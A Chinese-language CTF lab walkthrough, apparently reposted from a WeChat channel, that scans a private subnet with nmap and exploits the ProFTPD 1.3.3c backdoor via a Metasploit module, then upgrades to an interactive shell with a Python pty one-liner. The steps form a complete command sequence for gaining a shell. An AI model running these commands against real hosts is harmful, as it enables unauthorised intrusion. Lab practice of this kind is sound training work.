欢迎回来,我的新手黑客
今天依然没有故事也没有酒,今天给大家带来的是关于CTF方面的FTP服务后门,当然这个漏洞也有点历史了,不过我依然选择用文字把它记录下来,方便以后查阅,以及给有需要的人练手,提高操作能力
环境搭建:下载对应的镜像,使Kali和靶机处于同一个网段可以ping通
镜像下载地址:https://pan.baidu.com/s/17jAZss0rPKoEOXiv7mtQng
提取码:9wfv
Step1:和之前一篇CTF文章一样,还是先进行内网扫描,对于一个陌生的网络环境,只有通过扫描有助于我们找到目标,并探测出关于目标的更多消息
nmap -Pn -T4 192.168.83.0/24
现在找到我们的目标,从输出信息中看出,我们的目标主机IP地址为192.168.83.133,该主机上开放了以下端口:21,22,80;从该输出信息中可以联想到的突破口可能有:21号端口上面的FTP服务是否存在漏洞,22号端口上面的SSH服务是否存在私钥泄露,还有80端口运行的http服务有没有存在漏洞
通过上面的扫描结果,我们现在只可以联想到上述的几个点,接下来我们来验证
Step2:进行更进一步的探测,我们需要获取对应服务的版本信息
nmap -sV -T4 192.168.83.133
通过图片可以得知对应服务对应的版本信息,我们先来验证第一个想法---21号端口上面的FTP服务是否存在漏洞
Step3:可以得知FTP服务是通过ProFTPD 1.3.3c搭建的,接下来我们使用工具查找对应版本的漏洞,看看会不会发现什么
searchsploit ProFTPD 1.3.3c
msfconsole
search ProFTPD 1.3.3c
use exploit/unix/ftp/proftpd_133c_backdoor
info
show options
set RHOSTS 192.168.83.133
exploit
python -c "import pty;pty.spawn('/bin/bash')"
原文始发于微信公众号(Kali渗透测试教程):CTF入门之FTP服务后门渗透主机
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论